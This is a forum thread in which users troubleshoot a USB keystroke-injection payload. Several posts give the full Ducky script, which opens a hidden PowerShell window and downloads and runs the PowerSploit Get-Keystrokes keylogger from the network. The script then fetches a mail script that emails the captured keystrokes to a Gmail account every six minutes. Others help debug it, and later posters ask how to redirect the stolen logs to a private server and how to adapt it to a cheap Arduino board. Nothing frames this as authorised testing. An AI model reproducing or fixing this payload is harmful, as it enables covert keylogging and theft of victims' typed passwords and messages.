Jump to content

Recommended Posts

Posted (edited)

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script maybe this and the correction that may need to happen.

while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Edited by PoSHMagiC0de
forgot extra parenthesis.
Posted
On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script maybe this and the correction that may need to happen.


while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

 Hey thank for reply , y try to modify the mail.ps1 with


while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

i'm still getting the same issue .. empty emails. I can't solve this probleme ?

Posted

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location.  Where ever $env:temp points to.  If you type that out in powershell it will tell you.  Look for the key.txt while just running the keylogger.  If a file shows up and holds data then something is up with the emailer.  if you get no key.txt or no stuff in it then the keylogger is not logging.

Posted
31 minutes ago, PoSHMagiC0de said:

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location.  Where ever $env:temp points to.  If you type that out in powershell it will tell you.  Look for the key.txt while just running the keylogger.  If a file shows up and holds data then something is up with the emailer.  if you get no key.txt or no stuff in it then the keylogger is not logging.

Nop , i ad a look on %temp% et there is no log.txt created

tryed both script , same issue . Getting empty mails


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1

Posted

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

The default if ran on its own with no parameters it should create a key.log. in the temp folder.  The line below in the payload.txt changes that to key.txt if ran with it.

STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

<ight want to check your AV too.  The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.  

Posted (edited)
19 minutes ago, PoSHMagiC0de said:

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

The default if ran on its own with no parameters it should create a key.log. in the temp folder.  The line below in the payload.txt changes that to key.txt if ran with it.


STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.


IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

<ight want to check your AV too.  The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.  


Thank's , so if a got it right tue script should look like this . I'm going to try in a sec

 

So if a followed you right tu script should look like this

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
ENTER

 

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxx@gmail.com'
$ReportEmail.To.Add('xxxx@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

Edited by mrskannk
Posted

Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer.  Ignore it for now.  What you are going to have to do is verify the payload works without the RD or BB.  If it doesn't work without it on your test machine then it definitely will not work being launched from the device.

So, above I was trying to have you just jump on your test machine.  Run powershell and just use the two line commands I put out.

The first will download and launch get-keystokes function to memory for use.  Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be.  I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes.  If you get nothing, something is wrong but atleast you may get an error message if it does.  If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email.  So, ignore the RD for now until you know the scripts work.

 

Now if it does then try and run the payload by hand.  That means playing out by hand what the payload does to see if everything works.  

  • 1 month later...
  • 3 years later...
Posted

Hello everyone, 

I''ve been trying for days to transform this script so that it can send me the file with the results to my private server and not my email.

Does anyone have any idea concerning the Ducky or powershell code ?

Thank you 

Good evening

  • 2 months later...
Posted
On 3/8/2017 at 6:57 AM, Speed09 said:

I'm not good at powershell at all, but I managed to get the exfiltrate working.

I simply modified the payload to run a ps script from my server that will send me the log file via email.

Here is the final ducky script:

 DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.txt
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1')
ENTER

 

And here is the mail.ps1 content:

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'youradress@gmail.com'
$ReportEmail.To.Add('youradress@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} 

hi im a beginner and i use a micro pro arduino board as a rubber ducky

what should i change from this script as personal information??

please i need help

 

 

Posted

I guess that the end of that quote is actually your question. I'd suggest that you ask the question in some forum (or whatever) that is relevant to your hardware since you obviously isn't using a Hak5 USB Rubber Ducky.

  • 2 years later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...